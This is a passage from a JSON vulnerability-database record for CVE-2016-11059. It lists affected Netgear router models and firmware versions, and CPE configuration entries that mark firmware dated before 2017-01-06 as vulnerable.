"r6100", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.22" }, { "model": "r6100", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.28" }, { "model": "r6200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "r6200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.14" }, { "model": "r6220", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.46" }, { "model": "r6220", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.50" }, { "model": "r6220", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.60" }, { "model": "r6220", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.64" }, { "model": "r6220", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.66" }, { "model": "r6220", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.68" }, { "model": "r6220", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.80" }, { "model": "r6220", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.86" }, { "model": "r6250", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "r6250", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.6 10.1.12" }, { "model": "r6250", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.8" }, { "model": "r6250", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.12" }, { "model": "r6250", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.14" }, { "model": "r6250", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.16" }, { "model": "r6250", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.20" }, { "model": "r6250", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.26" }, { "model": "r6250", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.30" }, { "model": "r6250", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.34" }, { "model": "r6300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "r6300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.36" }, { "model": "r6300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.06" }, { "model": "r6300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.6" }, { "model": "r6300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.8" }, { "model": "r6300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.8 10.0.77" }, { "model": "r6300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.12" }, { "model": "r6300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.18" }, { "model": "r6300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.22" }, { "model": "r6300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.24" }, { "model": "r6300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.28" }, { "model": "r6300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.32" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.14" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.16" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.20" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.22" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.26" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.30" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.36" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.44" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.46" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.48" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.6" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.8" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.32" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.52" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.66" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.84" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.38" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.42" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.1.20" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.2.0.2" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.2.0.4" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.2.0.12" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.2.0.14" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.2.0.16" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.2.0.24" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.2.0.36" }, { "model": "r6700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.2.0.62" }, { "model": "r7000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "r7000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.7.2 1.1.93" }, { "model": "r7000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.7.10" }, { "model": "r7000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.9.4" }, { "model": "r7000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.9.6" }, { "model": "r7000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.9.10" }, { "model": "r7000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.9.12" }, { "model": "r7000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.9.14" }, { "model": "r7000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.9.18" }, { "model": "r7000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.9.26" }, { "model": "r7000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.9.28" }, { "model": "r7000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.9.32" }, { "model": "r7000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.9.34" }, { "model": "r7000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.9.42" }, { "model": "r7000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.9.60" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.108" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.110" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.112" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.116" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.118" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.122" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.124" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.130" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.10" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.16" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.20" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.24" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.26" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.34" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.36" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.38" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.40" }, { "model": "r7500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.46" }, { "model": "r7900", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "r7900", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.8" }, { "model": "r7900", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.12" }, { "model": "r7900", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.14" }, { "model": "r7900", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.16" }, { "model": "r7900", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.18" }, { "model": "r7900", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.26" }, { "model": "r7900", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.4" }, { "model": "r7900", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.10" }, { "model": "r7900", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.16" }, { "model": "r7900", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.8" }, { "model": "r7900", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.10" }, { "model": "r8000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "r8000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.22" }, { "model": "r8000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.24" }, { "model": "r8000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.26" }, { "model": "r8000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.32" }, { "model": "r8000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.36" }, { "model": "r8000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.44" }, { "model": "r8000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.46" }, { "model": "r8000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.48" }, { "model": "r8000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.3.54" }, { "model": "r8000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.2" }, { "model": "r8000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.4" }, { "model": "r8000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.4 1.1.42" }, { "model": "r8000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.12" }, { "model": "r8000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.18" }, { "model": "r8000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.28" }, { "model": "r8000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.4.46" }, { "model": "wndr3400", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "wndr3400", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.8" }, { "model": "wndr3400", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.12" }, { "model": "wndr3400", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.14" }, { "model": "wndr3400", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.16" }, { "model": "wndr3400", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.18" }, { "model": "wndr3400", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.24" }, { "model": "wndr3400", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.122" }, { "model": "wndr3700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "wndr3700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.86" }, { "model": "wndr3700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.88" }, { "model": "wndr3700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.92" }, { "model": "wndr3700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.94" }, { "model": "wndr3700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.96" }, { "model": "wndr3700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.46" }, { "model": "wndr3700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.48" }, { "model": "wndr3700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.50" }, { "model": "wndr3700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.54" }, { "model": "wndr4300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.48" }, { "model": "wndr4300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.50" }, { "model": "wndr4300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.52" }, { "model": "wndr4300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.54" }, { "model": "wndr4300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.56" }, { "model": "wndr4300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.88" }, { "model": "wndr4300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.90" }, { "model": "wndr4300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.92" }, { "model": "wndr4300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.94" }, { "model": "wndr4300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.96" }, { "model": "wndr4300", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.2.98" }, { "model": "wndr4500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "wndr4500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.48" }, { "model": "wndr4500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.50" }, { "model": "wndr4500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.52" }, { "model": "wndr4500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.54" }, { "model": "wndr4500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.56" }, { "model": "wndr4500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.62" }, { "model": "wndr4500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.68" }, { "model": "wndr4500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.72" }, { "model": "wndr4500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.48" }, { "model": "wnr1000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "wnr1000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.40" }, { "model": "wnr1000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.42" }, { "model": "wnr1000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.44" }, { "model": "wnr1000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.46" }, { "model": "wnr1000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.48" }, { "model": "wnr1000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.50" }, { "model": "wnr1000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.54" }, { "model": "wnr2000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.42" }, { "model": "wnr2000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.48" }, { "model": "wnr2000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.58" }, { "model": "wnr2000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.62" }, { "model": "wnr2000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.64" }, { "model": "wnr2000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.68" }, { "model": "wnr2000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.2.0.8" }, { "model": "wnr2500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "wnr2500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.58" }, { "model": "wnr3500l", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "wnr3500l", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.2.0.40" }, { "model": "wnr3500l", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.2.0.44" }, { "model": "wnr3500l", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.2.0.46" }, { "model": "wnr3500l", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.2.0.48" }, { "model": "wnr3500l", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.2.0.50" }, { "model": "wnr3500l", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.2.0.54" }, { "model": "wnr3500l", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.2.0.56" }, { "model": "wnr3500l", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.2.2.44 35.0.53na" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-11059" }, { "db": "JVNDB", "id": "JVNDB-2017-014989" }, { "db": "NVD", "id": "CVE-2016-11059" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:ac1450_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:ac1450:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:c6300_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:c6300:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:d1500_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:d1500:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:d3600_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:d3600:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:d500_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:d500:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:d6000_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:d6000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:d6100_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:d6100:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:d6200_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:d6200:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:d6200b_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:d6200b:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:d6300_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:d6300:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:d6300b_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:d6300b:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:dgn1000_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:dgn1000:v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:dgn2200:v1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:dgn2200:v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:dgn2200b:v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:dgn2200b:v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:dgnd3700_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:dgnd3700:v1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:dgnd3700_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:dgnd3700:v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:dgnd3700b_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:dgnd3700b:v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:jnr1010_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:jnr1010:v1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:jnr1010_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:jnr1010:v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:jnr3300_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": 